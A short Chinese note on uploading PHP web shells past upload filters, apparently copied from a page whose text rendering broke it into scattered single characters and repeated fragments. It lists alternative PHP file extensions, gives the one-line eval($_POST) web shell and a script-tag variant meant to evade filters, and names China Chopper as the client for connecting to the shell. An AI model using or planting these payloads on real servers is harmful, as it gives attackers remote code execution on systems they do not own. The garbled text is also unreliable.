.php上传被过滤时可以用的别名:php2, php3, php4, php5, phps, pht, phtm, phtml
可以上传的.php文件思路
(1)一句话木马:
<?php
eval(
P
O
S
T
[
′
a
′
]
)
;
?
>
(
2
)
绕
过
过
滤
方
式
1
:
<
s
c
r
i
p
t
l
a
n
g
u
a
g
e
=
"
p
H
p
"
>
@
e
v
a
l
(
_POST['a']); ?> (2)绕过过滤方式1: <script language="pHp">@eval(
POST[′a′]);?>(2)绕过过滤方式1:<scriptlanguage="pHp">@eval(_POST[‘a’])
上传完后使用中国菜刀连接